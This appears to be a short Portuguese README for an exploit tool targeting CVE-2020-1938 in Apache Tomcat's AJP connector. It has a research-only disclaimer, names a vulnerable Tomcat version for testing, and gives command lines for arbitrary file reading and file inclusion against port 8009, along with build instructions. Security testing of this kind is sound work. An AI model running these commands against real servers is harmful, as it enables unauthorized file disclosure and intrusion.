
CVE-2020-1938
A ferramenta destina-se apenas à pesquisa de segurança e à autoavaliação interna. É proibido usá-la para iniciar ataques ilegais; o usuário é responsável pelas consequências.

apache-tomcat-8.5.32.zip para testar o Tomcat
Leitura arbitrária de arquivos
java -jar 1.jar com.threedr3am.bug.tomcat.ajp.FileRead 127.0.0.1 8009 file /index.jsp
Inclusão de arquivo
java -jar 1.jar com.threedr3am.bug.tomcat.ajp.FileRead 127.0.0.1 8009 jsp /index.jsp
Método de empacotamento: No diretório tomcat/ajp-bug execute mvn clean compile assembly:assembly